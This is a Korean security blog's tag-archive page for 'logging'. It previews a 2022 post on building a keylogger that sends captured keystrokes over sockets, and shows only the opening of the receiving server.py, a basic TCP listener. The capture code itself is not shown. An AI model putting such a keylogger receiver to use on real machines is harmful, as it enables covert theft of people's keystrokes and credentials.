본문 바로가기

Digital Forensics JJamin

검색하기
Digital Forensics JJamin
프로필사진 jjamin

  • 분류 전체보기 (13)
    • Digital Forensics (0)
    • Security (6)
    • Activity (5)
    • Development (1)
Guestbook
Notice
Recent Posts
Recent Comments
Link
«   2025/08   »
일 월 화 수 목 금 토
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
31
Tags
  • KDFS
  • 디지털범인을찾아라
  • 합격후기
  • Database
  • 디지털포렌식 전문가 2급
  • 디지털 범인을 찾아라
  • 시스템
  • 후기
  • 핸즈온
  • 디지털포렌식
  • logging
  • 정보보안개론
  • 경진대회
  • Burp Suite
  • key
  • HTTPS Proxy
  • 동상
  • BoB 12기
  • 대상
more
Archives
Today
Total
관리 메뉴
  • 글쓰기
  • 방명록
  • RSS
  • 관리

목록logging (1)

Digital Forensics JJamin

[Security] 키 로깅 프로그램 제작

방학기념으로 키로깅 프로그램에 소켓통신을 더하여 만들었습니다. server.py 소켓통신을 이용하여 받은 값을 디코딩하여 출력해줍니다. import socket import threading IP = '***.***.*.*' PORT = 9998 def main(): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind((IP, PORT)) server.listen(5) print(f'[*] Listening on {IP}:{PORT}') while True: client, address = server.accept() print(f'[*] Accepted connection from {address[0]}:{address[1]}'..

Development 2022. 7. 9. 21:25
이전 Prev 1 Next 다음

Blog is powered by kakao / Designed by Tistory

티스토리툴바